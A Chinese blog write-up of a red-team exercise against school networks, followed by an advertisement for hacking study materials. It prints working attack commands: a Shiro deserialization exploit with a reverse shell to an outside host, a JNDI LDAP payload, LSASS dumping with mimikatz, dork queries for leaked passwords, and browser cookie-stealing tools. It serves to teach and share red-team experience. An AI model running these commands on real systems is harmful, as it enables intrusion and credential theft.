攻防演练|某市级HVV攻防演练总结
前言
正如今年的xx题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场
这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接 nday 打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平
不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正
外网打点
敏感信息泄露
一般来说学校外网能拿直接权限的点已经很少了,web 应用大多是放在 vpn 后面,因此能弄到一个 vpn 账号可以说是事半功倍
另外还可以通过语法筛选出存在默认弱口令的系统,常用命令如下:
PLAINTEXT
| 1234567 | #google语法site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码#github*.edu.cn password查看方式优先选择最近更新,太久远的基本上失效了 |
| --------- | ------------------------------------------------------------ |
| | |
这里队友收集到了某个目标的 vpn 账号,使用的是 姓名拼音/12345678 弱口令
进去内网后能访问的只有一个 OA 系统,测试了一下没发现什么东西,寻找其他突破口
shiro 无链
常规的打点可通过 fofa、hunter、quake 等网络测绘平台进行资产收集,收集好后进行去重,把去重后的资产列表进行批量指纹识别,筛选出重要易打点的系统
在常规的 hw 中这些方法比较通用,但是对于教育行业来说会相对困难,有 edusrc 的存在许多通用型漏洞已经被提交修复了,因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点
坐了一天牢后,终于通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是 shiro
直接工具开冲,发现有默认 key 但是无利用链
这里想到之前学习 shiro 可以无依赖利用,感觉有戏尝试一波,相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/
PLAINTEXT
java -jar shiro_tool.jar 地址VPS:端口
通过 dnslog 测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个 dnslog 平台测试
dnslog 有回显接下来就是拿 shell 了,这里由于固化思维,之前遇到的都是 linux 系统,先入为主觉得是 Linux,结果没利用成功
这里可以通过网站快速生成 payload,https://x.hacking8.com/java-runtime.html
一开始以为是防火墙拦截,后面队友探测了一下目录结构,发现是 windows,所以这里 payload 要改变一下
Linux:
PLAINTEXT
| 123 | java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值nc -lvp 端口 |
| ----- | ------------------------------------------------------------ |
| | |
Windows:
PLAINTEXT
123 | java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"d2hvYW1p为命令的base64,这里是执行命令whoami |
|---|---|
内网横向
上线 cs
dump lssas
这里看到是 08 机器直接抓一波密码,但这里密码是空口令,不然可以通过密码复用撞一波
如果碰到有杀软的情况,可以 dump lssas 出来本地进行读取,之前测试过一波 lolbins,但大多已经不免杀了,这里提供一种方法
dump64.exe
PLAINTEXT
1 | dump64.exe <pid> c:\users\out.dmp |
|---|---|
卡巴斯基拦截,火绒和 360 不拦截
dump 出来后通过 mimikatz 或者其他方式进行读取
PLAINTEXT
1 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit |
|---|---|
接着可以通过 netspy 筛选可达的网段(之前用的时候没注意,才发现是天威战队大哥的工具 = =)
https://github.com/shmilylty/netspy
但这里 192、172、10 段的资产比较少,这些段主要是一些网络设备如摄像头、网关设备,拿到的仅有 web 弱口令
大华 admin/admin
锐捷 admin/admin
突破隔离
主站的 c 段大多是不通的,猜测是做了隔离限制,因此开始考虑如何去突破隔离,这里尝试通过后台寻找一些任意文件上传的点看能否拿下一些机器
这里比较幸运,找到一个实验平台弱口令登录进去,找到一个新增模板导入模块,修改后缀 xls 为 aspx 拿到一个 shell
并且这个机器可以访问和到达教务网段,突破了隔离限制,通过 111.25.x.0/24 段服务器信息收集、漏洞利用,抓密码撞密码时间,最终获取 211.112.x.0/24 段多个服务器权限 (c 段为虚拟数据),下面列举一些例子
漏洞利用
redis
shiro
struts2
抓密码
拿到一台机器可以根据机器上安装的软件进行对应的密码读取,如 navicat、xshell 等
https://github.com/JDArmy/SharpXDecrypt
https://github.com/RowTeam/SharpDecryptPwd
sqlserver
mysql
浏览器
HackBrowserData](https://github.com/moonD4rk/HackBrowserData)
SharpWeb](https://github.com/djhohnstein/SharpWeb)
SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)
360SafeBrowsergetpass](https://github.com/hayasec/360SafeBrowsergetpass)
BrowserGhost](https://github.com/QAX-A-Team/BrowserGhost/)
Browser-cookie-steal (窃取浏览器 cookie)](https://github.com/DeEpinGh0st/Browser-cookie-steal)
文章来自网上,侵权请联系博主
互动话题:如果你想学习更多网安方面的知识和工具,可以看看以下题外话!
如果你是也准备转行学习网络安全(黑客)或者正在学习,这些我购买的资源可以分享给你们,互勉:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
一、网络安全(黑客)学习路线
网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网络安全教程视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
三、网络安全CTF实战案例
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
四、网络安全面试题
最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。
网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。
机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!
这份完整版的网络安全学习资料已经上传优快云,朋友们如果需要可以微信扫描下方优快云官方认证二维码免费领取【保证100%免费】
扫一扫
4414
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
